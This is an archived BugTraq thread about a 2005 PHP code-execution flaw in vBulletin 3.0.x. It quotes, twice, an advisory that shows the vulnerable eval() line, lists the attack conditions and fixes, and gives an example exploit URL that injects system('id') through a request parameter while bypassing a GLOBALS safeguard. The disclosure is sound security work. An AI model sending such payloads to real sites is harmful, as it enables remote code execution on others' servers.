BugTraq
Back to list
|
Post reply
vbulletin 3.0.x PHP code execution
Feb 13 2005 05:16PM
AL3NDALEEB (al3ndaleeb uk2 net)
(2 replies)
Re: vbulletin 3.0.x PHP code execution
Feb 16 2005 01:32AM
pokley (pokleyzz scan-associates net)
Proof of concept
On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb (at) uk2 (dot) net [email concealed]> wrote:
>
>
> Vulnerable Systems:
> ----------------
> vBulletin version 3.0 up to and including version 3.0.4
>
> Immune systems:
> ----------------
> vBulletin version 3.0.5
> vBulletin version 3.0.6
>
> Vulnerable code in forumdisplay.php :
> #############################################################
> if ($vboptions['showforumusers'])
> {
> .
> .
> .
> .
>
> if ($bbuserinfo['userid'])
> {
> .
> .
> .
> .
> $comma = ', ';
> }
> .
> .
> .
> .
> while ($loggedin = $DB_site->fetch_array($forumusers))
> {
> .
> .
> .
> eval('$activeusers .= "' . $comma .
> fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)
> $comma = ', ';
> .
> .
> }
> .
> .
> }
>
> #############################################################
>
> Conditions:
> ----------------
> 1st condition : $vboptions['showforumusers'] == True , the admin must
> set
> showforumusers ON in vbulletin options.
> 2nd condition : $bbuserinfo['userid'] == 0 , you must be an
> visitor/guest
> .
> 3rd condition : $DB_site->fetch_array($forumusers) == True , when you
> visit the forums, it must has at least one user show the forum.
> 4th condition : magic_quotes_gpc must be OFF
> SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
> init.php by secret array GLOBALS[]=1 ;)))
>
>
> Solutions:
> ----------------
> * Disable showforumusers in vbulletin options .
> * add the next line before if ($vboptions['showforumusers'])
> $comma = '';
>
> Exploit:
> ----------------
> example :
> http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
[ reply ]
Re: vbulletin 3.0.x PHP code execution
Feb 15 2005 03:30AM
pokley (pokleyzz scan-associates net)
Privacy Statement
Copyright 2010, SecurityFocus
On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb (at) uk2 (dot) net [email concealed]> wrote:
>
>
> Vulnerable Systems:
> ----------------
> vBulletin version 3.0 up to and including version 3.0.4
>
> Immune systems:
> ----------------
> vBulletin version 3.0.5
> vBulletin version 3.0.6
>
> Vulnerable code in forumdisplay.php :
> #############################################################
> if ($vboptions['showforumusers'])
> {
> .
> .
> .
> .
>
> if ($bbuserinfo['userid'])
> {
> .
> .
> .
> .
> $comma = ', ';
> }
> .
> .
> .
> .
> while ($loggedin = $DB_site->fetch_array($forumusers))
> {
> .
> .
> .
> eval('$activeusers .= "' . $comma .
> fetch_template('forumdisplay_loggedinuser') . '";'); <<==== (Vuln)
> $comma = ', ';
> .
> .
> }
> .
> .
> }
>
> #############################################################
>
> Conditions:
> ----------------
> 1st condition : $vboptions['showforumusers'] == True , the admin must
> set
> showforumusers ON in vbulletin options.
> 2nd condition : $bbuserinfo['userid'] == 0 , you must be an
> visitor/guest
> .
> 3rd condition : $DB_site->fetch_array($forumusers) == True , when you
> visit the forums, it must has at least one user show the forum.
> 4th condition : magic_quotes_gpc must be OFF
> SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
> init.php by secret array GLOBALS[]=1 ;)))
>
>
> Solutions:
> ----------------
> * Disable showforumusers in vbulletin options .
> * add the next line before if ($vboptions['showforumusers'])
> $comma = '';
>
> Exploit:
> ----------------
> example :
> http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
--
Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
[ reply ]